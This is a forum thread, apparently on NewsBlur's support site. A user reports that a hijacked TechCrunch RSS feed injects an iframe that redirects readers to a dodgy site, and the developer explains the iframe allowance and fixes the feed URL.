Protection against Browser Hijack from weird Techcrunch RSS feed

A couple days ago, when browsing through my Newsblur, I was being spontaneously redirected to a dodgy site. Looking into it, it seems the RSS is loading an iFrame which is triggering a URL load for the parent browser with a bunch of my meta data in the URL params.

Turns out, I added the Techcrunch RSS by putting the plain website into the ‘Add a new site’ and choosing an autocomplete option. I don’t know if it’s changed since, but the feed URL for it in my Newsblur is now (DO NOT CLICK) TechCrunch (DO NOT CLICK).

This is obviously malicious, and the feed shouldn’t be trusted any more so I’ll remove it. However I’d like to see some kind of protection in Newsblur to strip iFrames or even arbitrary Javascript, and perhaps protect against malicious feeds.

I have a screen recording of the recreation which I can give to you privately, Samuel, if you want it.

Oh interesting, I subscribe to that feed as well and I didnt see it because I had the stories hidden. I’ll fix this one off, but as for future protection, I sense a growing need to have something. We strip most everything from RSS feeds except iframes, where we explicitly allow it. It does offer protection against your data, even though it does force that icky redirect, but the offending website can’t access your data.

Here’s the code that allows for iframes:

But I’ll fix this site and get the main TechCrunch feed url back to normal. Thanks for letting me know!

1 Like

Did you get the feed itself fixed? https://newsblur.com/site/12/techcrunch is still definitely the hijacked feed. I’m starting to think they hijacked the actual Feedburner feed. The correct URL now looks like it should be https://techcrunch.com/feed

Thanks for reminding me, just fixed the feed as well.